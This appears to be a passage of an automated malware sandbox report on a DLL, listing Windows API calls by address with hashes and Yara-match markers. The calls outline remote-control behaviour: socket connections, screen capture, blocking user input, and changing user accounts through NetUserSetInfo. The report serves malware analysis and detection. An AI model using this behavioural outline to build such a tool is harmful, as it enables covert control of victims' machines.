• lstrlenA.KERNEL32(00000000), ref: 10025889
• NetUserGetInfo.NETAPI32(00000000,00000000,00000003,?), ref: 100258B8
  • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 10024614
  • Part of subcall function 100245F0: #823.MFC42(00000002,?,00000000,00000000), ref: 10024621
  • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1002463D
• NetUserSetInfo.NETAPI32(00000000,00000000,00000003,?,?,?), ref: 100258ED
• #825.MFC42(00000000,00000000,00000000,00000003,?,?,?), ref: 100258F5
• #825.MFC42(?,00000000,00000000,00000000,00000003,?,?,?), ref: 10025902
• NetApiBufferFree.NETAPI32(?), ref: 10025934
• LocalFree.KERNEL32(?), ref: 1002593E
Similarity
• API ID: #825ByteCharFreeInfoMultiUserWide$#823BufferLocallstrlen
• String ID:
• API String ID: 1574401665-0
• Opcode ID: 4deef81ed9964ded4ef6be6e35d77e14c2eeece9479341862667b8981f28ec86
• Instruction ID: db542bc96f26d639f55d823ab568073f523843db7179ccf286ad23694a425397
• Opcode Fuzzy Hash: 4deef81ed9964ded4ef6be6e35d77e14c2eeece9479341862667b8981f28ec86
• Instruction Fuzzy Hash: 08217FB5608301AFD710DF68EC85E5BBAECEF94604F44042DF58597243EA74E94C8BA2

                                                  APIs
                                                  • htons.WS2_32 ref: 100234F3
                                                  • inet_addr.WS2_32(?), ref: 10023509
                                                  • inet_addr.WS2_32(?), ref: 10023527
                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                  • setsockopt.WS2_32 ref: 1002355E
                                                  • connect.WS2_32(?,?,00000010), ref: 1002356E
                                                  • closesocket.WS2_32 ref: 1002357C
                                                    • Part of subcall function 100232C0: gethostbyname.WS2_32(?), ref: 100232C5
                                                    • Part of subcall function 100232C0: inet_ntoa.WS2_32(00000000), ref: 100232D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: inet_addr$closesocketconnectgethostbynamehtonsinet_ntoasetsockoptsocket
                                                  • String ID:
                                                  • API String ID: 1372979013-0
                                                  • Opcode ID: a076db341b62b5e459f863378d388fcc54060c0c050763b1ff6fa81f446d88c2
                                                  • Instruction ID: 004383c3fc2686cea437f660dfe81f0b064d2de5a6b80219a309b61b1ccdcd83
                                                  • Opcode Fuzzy Hash: a076db341b62b5e459f863378d388fcc54060c0c050763b1ff6fa81f446d88c2
                                                  • Instruction Fuzzy Hash: 8B11AEB4904711ABE310DF289C85AABB7E8FF84360F548B1DF498D22D0E770D9448B92
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 1001723D
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 10017248
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017259
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017264
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017273
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 1001727C
                                                  • DestroyCursor.USER32(?), ref: 100172AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CursorDestroy
                                                  • String ID:
                                                  • API String ID: 2236516186-0
                                                  • Opcode ID: d8505e23fb446c41012494cd6b92a324ddedd58825db3cd10bd00a0c1f8eaa5b
                                                  • Instruction ID: ef58890a3e63d9af94dba857a36f85de578af6b60b018718c6a648def18a2e7e
                                                  • Opcode Fuzzy Hash: d8505e23fb446c41012494cd6b92a324ddedd58825db3cd10bd00a0c1f8eaa5b
                                                  • Instruction Fuzzy Hash: 12210B752007159FD224DB69CC80BD6B3E8FB89720F150B1EE6AA97390CBB5B8018B91
                                                  APIs
                                                  • Sleep.KERNEL32(00000064,?,?), ref: 1002CDE1
                                                  • wsprintfA.USER32 ref: 1002CE0C
                                                  • closesocket.WS2_32(00000000), ref: 1002CE24
                                                  • TerminateThread.KERNEL32(?,00000000), ref: 1002CE5C
                                                  • CloseHandle.KERNEL32(1012E1C4), ref: 1002CE63
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleSleepTerminateThreadclosesocketwsprintf
                                                  • String ID: nsocket-di:%d
                                                  • API String ID: 1790861966-355283319
                                                  • Opcode ID: 5e9cecdae08bcc13155f2dc0e0e3925da6de784ec57e2fdc6bb6301439449f32
                                                  • Instruction ID: f1fe742e6bc93e52985f86997f566d677f6565d53bba40a8e15b1c0b7fc6fa7b
                                                  • Opcode Fuzzy Hash: 5e9cecdae08bcc13155f2dc0e0e3925da6de784ec57e2fdc6bb6301439449f32
                                                  • Instruction Fuzzy Hash: 91118C34604125ABDB10DB6CDCC4F927BE8F745360FA5422EE404D37E4E779A8678B52
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32 ref: 10026E26
                                                  • lstrcatA.KERNEL32(?,?), ref: 10026E38
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 10026E55
                                                  • CloseHandle.KERNEL32(00000000), ref: 10026E7D
                                                  • LocalFree.KERNEL32(?), ref: 10026E96
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryFileFreeHandleLocalSystemlstrcat
                                                  • String ID: p
                                                  • API String ID: 3845662661-2181537457
                                                  • Opcode ID: 14b9efa5483a32bc41595b6595029f4fa2cd9a01486b53e31f71f9e7ac383b4f
                                                  • Instruction ID: 0d636d5cf498f0e200fc51c94bb837cf85bd2e6de4a3745d098e481c266d8e14
                                                  • Opcode Fuzzy Hash: 14b9efa5483a32bc41595b6595029f4fa2cd9a01486b53e31f71f9e7ac383b4f
                                                  • Instruction Fuzzy Hash: 10018074504301ABE720DF28DC89BDB77E4BB88714F448E1CF299961D0D7B8A548CBA2
                                                  APIs
                                                  • GetSystemMetrics.USER32(00000000), ref: 1000EA0F
                                                  • GetSystemMetrics.USER32(00000001), ref: 1000EA13
                                                  • ChangeDisplaySettingsA.USER32 ref: 1000EA49
                                                  • ChangeDisplaySettingsA.USER32(?,00000001), ref: 1000EA56
                                                  • ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 1000EA66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ChangeDisplaySettings$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 840903655-3916222277
                                                  • Opcode ID: da8bcf99ab6d6381277834236ee77cd44cb5ccb353c2679cf74ed6f1b0556459
                                                  • Instruction ID: 9ef3ec576e7027de0717f9877b67978966fede7fd05d5f4f5218d1c1f9d83b39
                                                  • Opcode Fuzzy Hash: da8bcf99ab6d6381277834236ee77cd44cb5ccb353c2679cf74ed6f1b0556459
                                                  • Instruction Fuzzy Hash: F3F03A31A58324AAF720DB748D45F9B7AE4BF44B48F44091DB6589A1D0E7F5A4088F93
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                  • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                  • FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: RtlGetNtVersionNumbers$ntdll.dll$Wu
                                                  • API String ID: 145871493-827347692
                                                  • Opcode ID: 3a5023de112b28bf916a420b33a24eb5e73c65803f573f5a85b50ba34ba9b42a
                                                  • Instruction ID: 09d4a5295cafecadfccf82d9b2155801cc9e14fb598547b6df1a36380f90f309
                                                  • Opcode Fuzzy Hash: 3a5023de112b28bf916a420b33a24eb5e73c65803f573f5a85b50ba34ba9b42a
                                                  • Instruction Fuzzy Hash: EDF0307A2016626BD3519B29DC88D9B77EAEFC5710B154928F808D7350C738D842C6B1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$atoi$CloseHandle
                                                  • String ID:
                                                  • API String ID: 3951340052-0
                                                  • Opcode ID: e62650d6e6aef00fa924a334e24200a35e0e3f17518d4e4cf749f3330d5dd8ca
                                                  • Instruction ID: 35e90f4198e19bdfbf7dbd9c79c3c05d2f01ed367ae37d6b1a9d4c7903982bda
                                                  • Opcode Fuzzy Hash: e62650d6e6aef00fa924a334e24200a35e0e3f17518d4e4cf749f3330d5dd8ca
                                                  • Instruction Fuzzy Hash: 0E41E73B31456016C554F729BC41FBFA764FBE5722F81442FF1869A281CE206C9B83B9
                                                  APIs
                                                  • CreateDIBSection.GDI32(?,00000000,00000000,75755D50,00000000,00000000), ref: 100185E1
                                                  • SelectObject.GDI32(00000000,00000000), ref: 100185EF
                                                  • BitBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 1001860E
                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00CC0020), ref: 1001862F
                                                  • DeleteObject.GDI32(?), ref: 10018685
                                                  • free.MSVCRT ref: 10018694
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object$CreateDeleteSectionSelectfree
                                                  • String ID:
                                                  • API String ID: 2595996717-0
                                                  • Opcode ID: ee283649881eec98d8cbad5e7b64363b03abddda214ff71c648d186bcbc73e34
                                                  • Instruction ID: fa73614132ced6616fd7bc227f346a67f57bb193df799f847b61321046b9127f
                                                  • Opcode Fuzzy Hash: ee283649881eec98d8cbad5e7b64363b03abddda214ff71c648d186bcbc73e34
                                                  • Instruction Fuzzy Hash: E34126B5600705AFD714DF68CC84E6BB7EAFB88600F14891DF98A8B390D670EE458B61
                                                  APIs
                                                  • BlockInput.USER32(00000000), ref: 10016966
                                                  • BlockInput.USER32(?,?,?), ref: 10016989
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 100169A0
                                                  • BlockInput.USER32(?,?,?), ref: 100169A9
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 100169C0
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 100169D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BlockExchangeInputInterlocked
                                                  • String ID:
                                                  • API String ID: 3466551546-0
                                                  • Opcode ID: 7274aee29f7d4d2a2de31e6c4e64948058b118fdd37ba114e8c6fc55ca8315a3
                                                  • Instruction ID: bf2dd9b5654f157943e35733b8f3b73f0b93b8599c458bfd2c4311f32437dab4
                                                  • Opcode Fuzzy Hash: 7274aee29f7d4d2a2de31e6c4e64948058b118fdd37ba114e8c6fc55ca8315a3
                                                  • Instruction Fuzzy Hash: 3D31E33B30856157D284E738BC61EEFA755FFD9320B05892BF585DA241CA20E89683B0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: malloc$realloc$strstr
                                                  • String ID:
                                                  • API String ID: 686937093-0
                                                  • Opcode ID: 6c6eb5024497b7099948d6fa03faf251760030852925ab041fa65ee9e74f37cf
                                                  • Instruction ID: 77dd24013c4c70d5dbbb406fc0c88ef9f28fbba95e417396a5267408fea13c55
                                                  • Opcode Fuzzy Hash: 6c6eb5024497b7099948d6fa03faf251760030852925ab041fa65ee9e74f37cf
                                                  • Instruction Fuzzy Hash: AA3157366006114FC304CF3CAC8026AFBE5EBC9666F44067DEA89C3391DE75DD0A87A1
                                                  APIs
                                                  • #823.MFC42(?,00000058,00000000,00000000,0000005C,00000000,10017EFB,?,?,?,?,?,?,00000000), ref: 100188AB
                                                  • GetDC.USER32(00000000), ref: 10018906
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 10018913
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10018926
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 1001892F
                                                  • DeleteObject.GDI32(00000000), ref: 10018936
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823BitmapBitsCompatibleCreateDeleteObjectRelease
                                                  • String ID:
                                                  • API String ID: 1489246511-0
                                                  • Opcode ID: 232e81e2328815f38dc1846d181fe650c2457a96f065839fb43a6e4f516f74b8
                                                  • Instruction ID: c876030701d45069bbaf201adcf95ae34e10d61091fae5aa7b66ba3b571a8907
                                                  • Opcode Fuzzy Hash: 232e81e2328815f38dc1846d181fe650c2457a96f065839fb43a6e4f516f74b8
                                                  • Instruction Fuzzy Hash: 8D31C6716057018FD324CF69CCC4B66FBE6FF95308F188A6DE5498B291D770A649CB50
                                                  APIs
                                                  • #823.MFC42(?,0000005C,00000000,00000000,00000060,00000000,10018C0A,?,?,00000001), ref: 100190FB
                                                  • GetDC.USER32(00000000), ref: 10019156
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 10019163
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10019176
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 1001917F
                                                  • DeleteObject.GDI32(00000000), ref: 10019186
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823BitmapBitsCompatibleCreateDeleteObjectRelease
                                                  • String ID:
                                                  • API String ID: 1489246511-0
                                                  • Opcode ID: 03719f9758a2d591c926ce4265d16c4aa9b88d838764e5f7700e274da321e404
                                                  • Instruction ID: ef3514cd601d8d145b1532123b0b9183357df65c168f27f3a63bee1d8f630a14
                                                  • Opcode Fuzzy Hash: 03719f9758a2d591c926ce4265d16c4aa9b88d838764e5f7700e274da321e404
                                                  • Instruction Fuzzy Hash: 9631F3712057029FD324CF69CC88B5BFBE6FF89344F188A6DE5498B291E770A549CB90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strncmp
                                                  • String ID: false$null$true
                                                  • API String ID: 1114863663-2913297407
                                                  • Opcode ID: 91d1f1b8f70a343b433d271afb14712fc3e17406d41856bbb390e3b7e82bde90
                                                  • Instruction ID: 296cd3568020f873729137bb6a0ed8fb89ce19f7d88271f1051225536c2d6955
                                                  • Opcode Fuzzy Hash: 91d1f1b8f70a343b433d271afb14712fc3e17406d41856bbb390e3b7e82bde90
